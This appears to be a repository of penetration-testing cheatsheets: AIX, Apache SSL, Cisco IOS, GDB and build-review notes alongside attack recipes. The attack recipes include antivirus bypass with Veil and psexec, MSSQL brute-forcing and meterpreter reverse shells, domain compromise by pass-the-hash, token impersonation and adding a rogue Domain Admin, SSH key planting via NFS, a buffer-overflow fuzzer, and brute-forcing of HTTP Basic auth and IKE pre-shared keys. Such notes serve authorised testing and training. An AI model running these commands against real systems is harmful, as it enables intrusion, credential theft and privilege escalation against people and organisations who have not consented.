├── Cheatsheet_AIXBuild.txt
├── Cheatsheet_AVBypass.txt
├── Cheatsheet_ApacheSSL.txt
├── Cheatsheet_AttackingMSSQL.txt
├── Cheatsheet_BashScripting.txt
├── Cheatsheet_BuildReviews.txt
├── Cheatsheet_CTF.txt
├── Cheatsheet_CiscoIOS.txt
├── Cheatsheet_CookieStealing.txt
├── Cheatsheet_DomainAdminExploitation.txt
├── Cheatsheet_ExploitDev.txt
├── Cheatsheet_GDB.txt
├── Cheatsheet_GPG.txt
├── Cheatsheet_HTTPBasicAuth.txt
├── Cheatsheet_IKEScan.txt
├── Cheatsheet_LinuxPrivilegeEsc.txt
├── Cheatsheet_LocalSamDump.txt
├── Cheatsheet_MSFPostExploitation.txt
├── Cheatsheet_Metasploit.pdf
├── Cheatsheet_MetasploitPayloads.txt
├── Cheatsheet_MobileAppTesting.txt
├── Cheatsheet_Networking.txt
├── Cheatsheet_OWASPCheckList.txt
├── Cheatsheet_Oracle.txt
├── Cheatsheet_PenTesting.txt
├── Cheatsheet_Pyinstaller.txt
├── Cheatsheet_Python.pdf
├── Cheatsheet_Remediations.txt
├── Cheatsheet_SMBCapture.txt
├── Cheatsheet_SMBEnumeration.txt
├── Cheatsheet_SMTPOpenRelay.txt
├── Cheatsheet_SQLInjection.txt
├── Cheatsheet_SSLStrip.txt
├── Cheatsheet_Solaris.txt
├── Cheatsheet_Tools.txt
├── Cheatsheet_UsefulCommands.txt
├── Cheatsheet_VOIP.txt
├── Cheatsheet_Vlans.txt
├── Cheatsheet_VulnVerify.txt
├── Cheatsheet_WindowsCommandLine.pdf
├── Cheatsheet_WirelessTesting.txt
├── Cheatsheet_XSS.txt
├── Cheatsheet_scp.txt
└── README.md

--------------------------------------------------------------------------------
/Cheatsheet_AIXBuild.txt:
--------------------------------------------------------------------------------
oslevel:
--------

Reports back the installed service pack and maintenance levels of the AIX deployment.
Most of these return either nothing at all or a large amount of information.

oslevel (reports back the overall AIX version, e.g. 6.1.0.0)
oslevel -q (reports back known maintenance levels on the host)
oslevel -rq (reports back known Recommended Maintenance Levels, think major releases)
oslevel -sq (reports back known Service Packs - has returned a long list of service pack numbers for me; these are useful when looking at products in relation to the service pack)

e.g.
oslevel -s -g 6100-08-03-1339

lslpp:
------

Displays information about installed filesets/software and updates. It is particularly useful when its own output is fed back into it:

e.g.
lslpp -l (lists all filesets, their most recent level and state)
The fileset names can be passed back to it for more info, showing their patch/update history.

e.g.
lslpp -h bos.rte - returns the history of updates applied to the Base Operating System fileset, bos.rte

rpm:
----

Standard Red Hat package manager, has turned up on a few machines.

rpm -qa
rpm -qa --last
These report back the packages installed by rpm and when.

Other than those, it's the same combination of looking through directories and permissions on files. I usually end up checking with "find" and the "-perm" flag:
e.g. find /home/ -perm 777
(-perm 777 only matches that exact mode; find /home/ -perm -0002 catches anything world-writable)

--------------------------------------------------------------------------------
/Cheatsheet_AVBypass.txt:
--------------------------------------------------------------------------------
1. Generate an executable using Veil.

2. In msfconsole set up psexec with the relevant payload (windows/meterpreter/reverse_tcp) and point EXE::Custom at the Veil binary. The module's PAYLOAD, LHOST and LPORT must match what the Veil executable was generated with, since EXE::Custom only replaces the service binary that is uploaded and started; the handler is still Metasploit's.

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(psexec) > set SMBUser user
SMBUser => user
msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exe
EXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe
msf exploit(psexec) > exploit

--------------------------------------------------------------------------------
/Cheatsheet_ApacheSSL.txt:
--------------------------------------------------------------------------------
# Enabling self-signed certificates on a local website

1. Install OpenSSL

sudo apt-get install openssl

2. Run the following command to generate the self-signed SSL certificate and key (-nodes leaves the key unencrypted so Apache can start unattended, so keep it root-only, mode 600, under /etc/ssl/private):

sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key

3. Enable the SSL module for Apache

sudo a2enmod ssl

4. Enable the default-ssl site by creating a symbolic link into sites-enabled (sudo a2ensite default-ssl does the same thing)

sudo ln -s /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/000-default-ssl.conf

5. Edit the file default-ssl.conf

sudo nano /etc/apache2/sites-enabled/000-default-ssl.conf

Change the following lines to point to the certs:

SSLCertificateFile /etc/ssl/certs/server.crt
SSLCertificateKeyFile /etc/ssl/private/server.key

6. Restart Apache

sudo /etc/init.d/apache2 restart

More information:
https://hallard.me/enable-ssl-for-apache-server-in-5-minutes/
https://www.sslshopper.com/article-how-to-create-and-install-an-apache-self-signed-certificate.html
http://www.akadia.com/services/ssh_test_certificate.html
https://www.sslshopper.com/apache-server-ssl-installation-instructions.html
http://www.emreakkas.com/linux-tips/invalid-command-sslengine-enabling-ssl-on-ubuntu-server

--------------------------------------------------------------------------------
/Cheatsheet_AttackingMSSQL.txt:
--------------------------------------------------------------------------------
[+] Attacking MSSQL with Metasploit

[>] Enumerate MSSQL Servers on the network:

msf > use auxiliary/scanner/mssql/mssql_ping
nmap -sU -p 1434 --script=ms-sql-info 192.168.1.108 192.168.1.156
(both query the SQL Server Browser service on UDP 1434; instances without the Browser service only show up on TCP 1433 or their custom port)
Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio.

[>] Bruteforce MSSQL Database:

msf > use auxiliary/scanner/mssql/mssql_login

[>] Enumerate MSSQL Database:

msf > use auxiliary/admin/mssql/mssql_enum

[>] Gain shell using gathered credentials (the module relies on xp_cmdshell, so the account needs sysadmin rights)

msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp

--------------------------------------------------------------------------------
/Cheatsheet_BashScripting.txt:
--------------------------------------------------------------------------------
Simple Bash Scripting Cheatsheet
--------------------------------

[+] nano Shortcuts
ctrl v    Next page.
ctrl y    Previous page.
ctrl w    Where is (find).
ctrl k    Cut that line of text.
ctrl x    Exit editor.

[+] Create a text file:
touch file          Creates an empty file.
ifconfig > tmp      Redirect the output of a command into a file (overwrites it).
nano file

[+] Create a file and append text to it:
ifconfig > tmp
echo >> tmp
ping google.com -c3 >> tmp

[+] How to view a file:
cat file            Show entire contents of file.
more file           Show one page at a time. Space bar for next page and (q) to exit.
head file           Show the first 10 lines.
head -15 file       Show the first 15 lines.
tail file           Show the last 10 lines.
tail -15 file       Show the last 15 lines.
tail -f file        Useful when viewing the output of a log file.

[+] pipe
cat tmp | grep Bcast    Feeds the output of one process to the input of another process.

[+] Processes
ps aux              Show all running processes for all users.
kill PID            Ask a process to exit (SIGTERM).
kill -9 PID         Force-kill a PID (SIGKILL); the process gets no chance to clean up, so try plain kill first.

[+] Word Count
wc -l tmp2          Count the number of lines in a file

[+] cut
-d delimiter
-f fields

[+] sort
Sort by unique                sort -u file
Sort IP addresses correctly   sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n
cat tmp2 | cut -d '(' -f2 | cut -d ')' -f1 | sort -u    Isolate the IP address (e.g. from ping/nslookup output where it sits in brackets)

[+] awk
awk '{print $1}' file       Show the 1st column.
awk '{print $1,$5}' file    Show the 1st and 5th columns.

[+] grep
grep -v                     Remove lines containing a single string.
grep -v 'red' file

[+] egrep -v
Remove multiple strings     egrep -v '(red|white|blue)' file

[+] sed
sed 's/FOO/BAR/g' file      Replace FOO with BAR.
sed 's/FOO//g' file         Replace FOO with nothing.
sed '/^FOO/d' file          Remove lines that start with FOO.

[+] colour
31=red 32=green 33=yellow 34=blue 35=magenta 36=cyan
echo -e "\e[1;34mThis is blue text.\e[0m"




Bash Scripts
------------

[+] Simple bash script:
#!/bin/bash
clear
echo
echo
echo "Hello world."

[+] Make a file executable.
chmod +x file
chmod 755 file

[+] Variables
name=Bob
echo $name
user=$(whoami)
echo $user
echo 'Hello' $name. 'You are running as' $user.

#!/bin/bash
clear
echo "Hello World"
name=Bob
ip=$(ifconfig | grep "Bcast:" | cut -d":" -f2 | cut -d" " -f1)
echo "Hello" $name "Your IP address is:" $ip

[+] User Input
read -p "Domain: " domain

#!/bin/bash
echo "Please input your domain:"
read -p "Domain:" domain
ping -c 5 "$domain"

[+] Check For No User Input (quote the variable, otherwise an empty value makes the test fail with a syntax error instead of matching -z)
if [ -z "$domain" ]; then
    echo
    echo "#########################"
    echo
    echo "Invalid choice."
    echo
    exit
fi

[+] For loops
#!/bin/bash

for host in $(cat hosts.txt)
do
    command $host
done

[+] One Liners

Port Scan:
for port in $(cat Ports.txt); do nc -nzv 192.168.0.1 $port & sleep 0.5; done

--------------------------------------------------------------------------------
/Cheatsheet_BuildReviews.txt:
--------------------------------------------------------------------------------
Build Review Cheatsheet
-----------------------

[+] Main tasks:

Any third party installed software and all associated versions.
Password policy applied locally via net accounts commands.
Domain policy applied, including domain password policy.
Logging settings.
Running services and unquoted service paths.
Permissions set on services.
List of patches and hotfixes installed.
Efficacy of AV solutions. May require import of a benign EICAR test file.
USB policy and removable media access (including FireWire, CD etc).
Disk encryption (if relevant).
BIOS passwords set.
Proxy settings (if relevant).
Nessus Scan (With Credentials).
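The "net accounts" item in the task list above is easy to script. The following is an added example (Python, not part of the original cheatsheet): it parses the output of net accounts, flags the weak settings, and prints findings. The thresholds are assumptions loosely based on common hardening baselines, so adjust them to the client's own policy; the sample output embedded in the block is constructed to look like a default workgroup build, not captured from a real host.

```python
"""Parse `net accounts` output and flag weak password / lockout settings.

Added example, not the cheatsheet's own tooling. On the host run
`net accounts > accounts.txt` (or `net accounts /domain`), then
`python3 check_net_accounts.py accounts.txt`.
"""
import sys

# Constructed sample of what `net accounts` prints on a default workgroup build.
SAMPLE = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          Unlimited
Minimum password length:                              0
Length of password history maintained:                None
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        WORKSTATION
The command completed successfully.
"""


def _num(value):
    """Integer value of a field; 'Never', 'Unlimited' and 'None' become None."""
    try:
        return int(value)
    except ValueError:
        return None


def parse_net_accounts(text):
    """Return {setting: value}. The last ':' on a line separates key and value,
    which copes with the question mark in 'Force user logoff ...?:'."""
    settings = {}
    for line in text.splitlines():
        if ':' not in line:
            continue
        key, _, value = line.rpartition(':')
        settings[key.strip().rstrip('?')] = value.strip()
    return settings


def check_policy(settings, min_len=12, max_age=90, history=24, lockout=10):
    """Return a list of (setting, value, why) findings. Thresholds are assumed
    baseline values, passed as parameters so they can be tuned per engagement."""
    findings = []

    def flag(name, bad, why):
        value = settings.get(name, '')
        if bad(_num(value)):
            findings.append((name, value, why))

    # None means a non-numeric value such as Never/Unlimited/None, which is
    # always the weak case for these five settings.
    flag('Minimum password length', lambda n: n is None or n < min_len,
         'below %d characters' % min_len)
    flag('Maximum password age (days)', lambda n: n is None or n > max_age,
         'Unlimited or above %d days' % max_age)
    flag('Minimum password age (days)', lambda n: n is None or n < 1,
         'users can cycle straight through the history back to the old password')
    flag('Length of password history maintained', lambda n: n is None or n < history,
         'fewer than %d passwords remembered' % history)
    flag('Lockout threshold', lambda n: n is None or n > lockout,
         'Never, or more than %d attempts before lockout' % lockout)
    return findings


if __name__ == '__main__':
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE
    for setting, value, why in check_policy(parse_net_accounts(text)):
        print('[!] %s: %s (%s)' % (setting, value, why))
```

Run it with no argument to see the findings for the embedded sample; for a domain-joined host compare the local output against net accounts /domain, since the domain policy is the one that actually applies to domain accounts.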

[+] Windows Hosts:

[+] Server Roles
[+] Server Manager
[+] System Properties
[+] Default Domain Policy
[+] Global Domain Policy

[+] Net accounts/Users/groups/Administrators
[+] IPConfig/Routing

[+] Installed Programs
[+] Installed System Updates
[+] AV Version/Definition Dates
[+] Check Computer folders

[+] Firewall Configuration
[+] Audit Policy
[+] Password/Lockout Policy
[+] Security Policy
[+] User Rights Policy

[+] Lanman Parameters (HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters)
[+] LSA (HKLM\SYSTEM\CurrentControlSet\Control\Lsa)
[+] MSV (HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0)

systeminfo command

BIOS password
boot to usb
file system
- encrypted?
- grab /Windows/System32/config/SAM SECURITY SYSTEM
- put C:\Program.exe (e.g. a copy of calc) - tests unquoted service paths: a service started from an unquoted path under C:\Program Files\... will try C:\Program.exe first

Control Panel
- Windows Firewall
  - enabled
  - editable
  - logs
- System Info
- Windows Update

Anti-Virus
- config
- logs
- version
- dates
- EICAR

cmd.exe
script.cmd
- ipconfig /all
- netstat
- net accounts
- net accounts /domain (review password policy)
- net user hacker Password@1 /add (can a local account be created? remove it again afterwards)
- regedit
- ping
- schtasks
- tracert
- net use \\IP_address_or_host_name\ipc$ "" /user:"" # null session
- net use
- net view
- net start
- tasklist

mount usb
usb autostart

copy over files
- nc
- enum
- nmap
- DIRE
- EICAR

# SAM files in backtrack
/Windows/System32/config/SAM SECURITY SYSTEM

# mounting on desktop review
# mount
# sda1 = client hdd, sdb2 = my usb part 2
# mkdir /mnt/client-hdd
# mount /dev/sda1 /mnt/client-hdd
# mkdir /mnt/win-usb
# mount /dev/sdb2 /mnt/win-usb

hosts file C:\Windows\System32\drivers\etc\hosts

SYSVOL GPO preference item, check for obscured passwords in xml. The cpassword attribute is AES-encrypted with a key Microsoft published, so any value found is effectively plaintext; MS14-025 stopped new passwords being set this way but does not remove existing ones.
http://blogs.technet.com/b/grouppolicy/archive/2008/08/04/passwords-in-group-policy-preferences.aspx

The history file is readable by any authenticated user, as shown below:
C:\Users\All Users\Microsoft\Group Policy\History\{A1C0C41B-D2F8-401B-A5D1-437DA197A809}\Machine\Preferences\Groups\Groups.xml
The same Group Policy Preference XML configuration file is also accessible via the following UNC path on the Domain Controller, again by any authenticated user:
\\Domain_Controller\sysvol\Domain_Name\Policies\{A1C0C41B-D2F8-401B-A5D1-437DA197A809}\Machine\Preferences\Groups\Groups.xml


[+] Unix Based Hosts:

hostname
whoami
uname -a
cat /etc/lsb-release
dmesg | grep Linux
cat /etc/passwd
cat /etc/sudoers
netstat -antup
ps aux
ps aux | grep root
crontab -l
/sbin/ifconfig -a
iptables -L
arp -e
cat ~/.bash_history
cat ~/.ssh/authorized_keys
mount

- Check installed applications
- Check installed compilers/interpreters

--------------------------------------------------------------------------------
/Cheatsheet_CTF.txt:
--------------------------------------------------------------------------------
CTF Notes
---------

# Enumerate users via finger
finger user@192.168.0.20

# Show NFS shares available
showmount -e 192.168.1.54

# Use nfspysh to mount the share and create a .ssh directory
# (nfspy presents whatever uid/gid the export expects, which is what makes writing into the user's home possible)
nfspysh -o server=192.168.0.20:/home/user
mkdir .ssh
cd .ssh

# Generate an SSH key pair (on the attacking machine)
ssh-keygen
cp ~/.ssh/id_rsa.pub /tmp/authorized_keys

# Transfer the attacker's public key to the host (back in the nfspysh shell)
put /tmp/authorized_keys
exit

# Log in to the SSH server with the key, no password needed
SSH_AUTH_SOCK=0 ssh user@192.168.0.20

--------------------------------------------------------------------------------
/Cheatsheet_CiscoIOS.txt:
--------------------------------------------------------------------------------
Cisco IOS Command Line Cheatsheet
---------------------------------

--- Verify Basic Configuration:

Shows information about the switch and its interfaces, RAM, NVRAM, flash, IOS, etc.
SW1# show version

Shows the current configuration held in RAM (the running config).
SW1# show running-config

Shows the configuration file stored in NVRAM, which is loaded at boot.
SW1# show startup-config

Lists the commands currently held in the history buffer.
SW1# show history

Shows an overview of all interfaces, their physical status, protocol status and IP address if assigned.
SW1# show ip interface brief

Shows detailed information about the specified interface: its status, protocol, duplex, speed, encapsulation, last 5 min traffic.
SW1# show interface vlan 1

Shows the description of all interfaces
SW1# show interfaces description

Shows the status of all interfaces: connected or not, speed, duplex, trunk or access VLAN.
SW1# show interfaces status

Shows the public RSA key used for SSH.
SW1# show crypto key mypubkey rsa

Shows information about the leased IP address (when an interface is configured to get its IP address via a DHCP server)
SW1# show dhcp lease

--- Router Modes:

Router>: User mode = Limited to basic monitoring commands
Router#: Privileged mode (exec-level mode) = Provides access to all other router commands
Router(config)#: Global configuration mode = Commands that affect the entire system
Router(config-if)#: Interface mode = Commands that affect interfaces
Router(config-subif)#: Subinterface mode = Commands that affect subinterfaces
Router(config-line)#: Line mode = Commands that affect lines (console, vty, aux...)
Router(config-router)#: Router configuration mode

--- Changing switch hostname:

Switch(config)# hostname SW1

--- Configuring passwords:

SW1(config)# enable secret cisco      ! stored hashed (type 5 MD5 by default on older IOS; use "enable algorithm-type scrypt secret ..." where supported)
SW1(config)# enable password notcisco ! clear text, ignored when an enable secret is set

--- Securing console port:

SW1(config)# line con 0
SW1(config-line)# password cisco
SW1(config-line)# login

--- Securing terminal lines:

SW1(config)# line vty 0 4
SW1(config-line)# password cisco
SW1(config-line)# login

--- Encrypting passwords:

SW1(config)# service password-encryption   ! type 7 encoding of line/enable passwords: reversible obfuscation, not protection

--- Configuring banners:

SW1(config)# banner motd $
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
UNAUTHORIZED ACCESS IS PROHIBITED
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
$

--- Giving the switch an IP address:

SW1(config)# interface vlan 1
SW1(config-if)# ip address 172.16.1.11 255.255.255.0   ! or "ip address dhcp"
SW1(config-if)# no shutdown

--- Setting the default gateway:

SW1(config)# ip default-gateway 172.16.1.1

--- Saving configuration:

SW1# copy running-config startup-config
Destination filename [startup-config]?   ! Press enter to confirm the file name.
Building configuration...
[OK]

! Short for write memory.
SW1# wr
Building configuration...
[OK]

--------------------------------------------------------------------------------
/Cheatsheet_CookieStealing.txt:
--------------------------------------------------------------------------------
[+] Cookie Stealing:

[-] Start Web Service

python -m SimpleHTTPServer 80
(Python 3: python3 -m http.server 80)

[-] Use one of the following XSS payloads:


--------------------------------------------------------------------------------
/Cheatsheet_DomainAdminExploitation.txt:
--------------------------------------------------------------------------------
[+] After compromising a Windows machine:

[>] List the domain administrators:
From Shell - net group "Domain Admins" /domain

[>] Dump the hashes (Metasploit)
meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE

[>] Find where the admins are logged in (Metasploit; smb_enumusers_domain lists the users logged on to each host)
msf > spool /tmp/enumdomainusers.txt
msf > use auxiliary/scanner/smb/smb_enumusers_domain
msf > set smbuser Administrator
msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
(an LM:NT hash pair from the dump is passed directly, no cracking needed; the value shown is the hash of an empty password, substitute the real Administrator hash)
msf > set rhosts 10.10.10.0/24
msf > set threads 8
msf > run

msf > spool off

[>] Compromise Admin's box
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token MYDOM\\administrator
meterpreter > getuid
meterpreter > shell

C:\> whoami
mydom\administrator
C:\> net user hacker /add /domain
C:\> net group "Domain Admins" hacker /add /domain

--------------------------------------------------------------------------------
/Cheatsheet_ExploitDev.txt:
--------------------------------------------------------------------------------
Exploit Development Cheatsheet
------------------------------

[+] Fuzzing:

import socket

# Strings of A's growing by 50 bytes each round, up to 1000 bytes.
buffer = ["A"]
counter = 50

while counter <= 1000:
    buffer.append("A" * counter)
    counter = counter + 50

for buffstring in buffer:
    print("Fuzzing: " + str(len(buffstring)))
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect(("192.168.0.20", 5555))
        sock.send(buffstring.encode())
    except socket.error:
        # Connection refused/reset: the previous length is the one that crashed the service.
        print("Service stopped responding at length " + str(len(buffstring)))
        break
    finally:
        sock.close()


[+] Bad Character Testing:

Send every byte value after the overwrite and compare what ends up in memory with what was sent; a byte that is missing or mangled (and, on the first pass, everything after it) is a bad character. \x00 is almost always bad and is usually removed from the start.

badchars = (
    b"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e"
    b"\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d"
    b"\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c"
    b"\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b"
    b"\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a"
    b"\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59"
    b"\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68"
    b"\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77"
    b"\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86"
    b"\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95"
    b"\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4"
    b"\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3"
    b"\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2"
    b"\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
    b"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"
    b"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe"
    b"\xff"
)


[+] Structured Exception Handler (SEH) Exploitation notes

- Crash the application
- Check the SEH overwrite (View -> SEH chain)
- Find the offset (!mona pattern_create )
- Find the SEH references to the cyclic pattern (!mona findmsp)
- Verify the offset to nSEH (the Next SEH record pointer)
- Find a POP/POP/RET address with mona (!mona seh -cpb )
- Add a short jump into the payload to jump over the SEH record ("\xeb\x06" + 2 bytes of padding): the jump goes in nSEH, and the 6-byte hop skips the 2 padding bytes plus the 4-byte handler address that follows, landing on the shellcode
- Add the shellcode to the payload
- Adjust the padding so the total length is unchanged and the crash still happens

--------------------------------------------------------------------------------
/Cheatsheet_GDB.txt:
--------------------------------------------------------------------------------
set disassembly-flavor intel

$ cat ~/.bash_aliases | grep gdb
alias gdb='gdb -quiet'

Running gdb
------------------
$ gdb                        - run, then use the file command to load an object
$ gdb -quiet                 - suppress copyright information
$ gdb object                 - normal debug
$ gdb object core            - analyse core dump
$ gdb object pid             - attach to running process

General commands
------------------
set args                     - set program arguments
show args                    - show program arguments
run                          - run the program
run < file                   - run with input from file
set follow-exec-mode new/same - set debugger response to an exec call
set write on                 - allow writing into executables
set write off                - disallow writing into executables
continue                     - continue running until break
finish                       - execute until current stack frame ends
source FILE                  - read commands from script file
shell [cmd]                  - run cmd in a shell
display /5i $eip             - display expression every time execution stops
undisplay                    - undisplay expression number
info functions               - list all the functions
info variables               - list all the variables
info registers               - list most common registers
info all-registers           - list all registers
info display                 - print the list of displayed expressions
backtrace                    - print backtrace of all stack frames
where                        - same as backtrace
set disassembly-flavor intel - set disassembly style to intel/att
define hook-[cmd]            - actions to execute before command
define hookpost-[cmd]        - actions to execute after command
define hook-stop             - actions to execute when execution stops

Breakpoints
------------------
info breakpoints             - list all breakpoints
break [func]                 - break at function name
break *[addr]                - break at address
delete [bnum]                - delete breakpoint bnum
break if [cond]              - break if condition
ignore [bnum] [count]        - ignore breakpoint bnum count times
condition [bnum] $eax == 0x22 - add condition for breakpoint bnum
condition [bnum]             - delete condition for breakpoint bnum

Watchpoints
------------------
info watchpoints             - list all the watchpoints
watch variable==value        - break when variable equals ...
watch $eax == 0x0000ffaa     - break when register equals ...
rwatch *[addr]               - break on read of memory location
awatch *[addr]               - break on read/write of memory location

--------------------------------------------------------------------------------
/Cheatsheet_GPG.txt:
--------------------------------------------------------------------------------
Encrypt
------------
gpg -e ~/Desktop/file.doc

This will prompt for the recipient's name (public key); -r name skips the prompt. The output is written to file.doc.gpg. Run gpg as your own user, not under sudo, otherwise root's keyring is used and your imported keys are not found.

Decrypt
-----------
gpg -d ~/Desktop/file.doc.gpg > ~/Desktop/file.doc


Import other users' public keys with:

gpg --import their-key.asc

--------------------------------------------------------------------------------
/Cheatsheet_HTTPBasicAuth.txt:
--------------------------------------------------------------------------------
[>] HTTP Basic Authentication Dictionary and Brute-force attacks with Burp Suite

http://www.dailysecurity.net/2013/03/22/http-basic-authentication-dictionary-and-brute-force-attacks-with-burp-suite/

Burp Suite against HTTP Basic authentication

To implement the attack you need to capture one authentication request with Burp Proxy and send it to Burp Intruder.

Mark only the Base64 encoded string and click the Add button to put the markers around it.

Dictionary attack

For the dictionary attack I'm using the custom iterator Intruder option. It allows you to generate your own custom payload string consisting of several substrings. For every substring you can specify a separator, which is basically a suffix. The Intruder calls those substrings "positions".
Following this logic, in position 1 we would like to load a username followed by the separator, a colon, and then load the password for position 2.
Go to the Payload tab and select the Custom iterator option from the Payload type dropdown box.
[screenshot: Burp Suite Custom Iterator]
Select position 1 from the Position dropdown box and load your usernames list in the List items for position 1 listbox. Put a colon in the Separator for position 1 text box.
[screenshot: Position 1 list and separator option]
Select position 2 from the Position dropdown box and load your passwords list in the List items for position 2 listbox.
[screenshot: Position 2]
After you've set your two positions you need to tell the Intruder to encode the payload string using Base64 encoding. Go to the Payload processing section and click the Add button. Select the Payload encoding option and then Base64.
[screenshot: Payload processing, add rule, encode]
[screenshot: Payload processing, encode]
By default Burp Intruder URL-encodes the payload. Base64 strings often contain the = symbol. That is why it is a good idea to exclude it from the list of URL characters for encoding.
That's it. You can start the Intruder attack.

Bruteforce attack

The method I'm using for the bruteforce attack targets only one username per Intruder attack.
Select Brute forcer from the Payload type dropdown and then set the length of the password and the character set you would like the Intruder to use while constructing the password strings.
[screenshot: Burp Intruder Brute forcer]
In order to specify the username you would like to brute-force you need to set a Payload processing rule. Add a new rule of type Add prefix and fill in the username followed by a colon.
[screenshot: Burp Intruder Add Prefix]
Add another rule to encode the payload using Base64. And finally remove = from the list of symbols subject to URL encoding.
[screenshot: Burp Suite Bruteforce Attack Settings]
Done! You can start the Intruder attack!

[>] Automated Security Analyser for ASP.NET Websites

https://asafaweb.com

--------------------------------------------------------------------------------
/Cheatsheet_IKEScan.txt:
--------------------------------------------------------------------------------
Aggressive Mode VPN -- IKE-Scan, PSK-Crack

In IKE aggressive mode the authentication hash based on the pre-shared key (PSK) is transmitted in response to the initial packet of a VPN client that wants to establish an IPsec tunnel (HASH_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump (or simply to request one with ike-scan, as below), and start a dictionary or brute-force attack against the hash to recover the PSK.

This attack only works in IKE aggressive mode because in IKE main mode the hash is already encrypted. For that reason IKE aggressive mode with PSK authentication is not very secure.

It looks like this:

$ ike-scan 192.168.207.134
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

192.168.207.134 Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=f320d682d5c73797)
Ending ike-scan 1.9: 1 hosts scanned in 0.096 seconds (10.37 hosts/sec).
0 returned handshake; 1 returned notify

----------------------------------------------------------------------------------------------------------------------------------

$ sudo ike-scan -A 192.168.207.134
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ikescan/)

192.168.207.134 Aggressive Mode Handshake returned HDR=(CKY-R=f320d6XXXXXXXX) SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=12f5f28cXXXXXXXXXXXXXXX (Cisco Unity) VID=afcad71368a1XXXXXXXXXXXXXXX (Dead Peer Detection v1.0) VID=06e7719XXXXXXXXXXXXXXXXXXXXXX VID=090026XXXXXXXXXX (XAUTH) KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value=192.168.207.134) Nonce(20 bytes) Hash(16 bytes)

----------------------------------------------------------------------------------------------------------------------------------

To save the handshake in psk-crack format (--id should be a group name the gateway accepts; Hash=MD5 and Hash(16 bytes) above tell you the hash to crack is HMAC-MD5):

$ sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key

Once you have your PSK file to crack you have two options: psk-crack and Cain.

----------------------------------------------------------------------------------------------------------------------------------

Brute force:

$ psk-crack -b 5 192-168-207-134key
Running in brute-force cracking mode
Brute force with 36 chars up to length 5 will take up to 60466176 iterations

no match found for MD5 hash 5c178d[SNIP]
Ending psk-crack: 60466176 iterations in 138.019 seconds (438099.56 iterations/sec)

The default charset is "0123456789abcdefghijklmnopqrstuvwxyz" and can be changed with --charset=

$ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
Running in brute-force cracking mode
Brute force with 63 chars up to length 5 will take up to 992436543 iterations

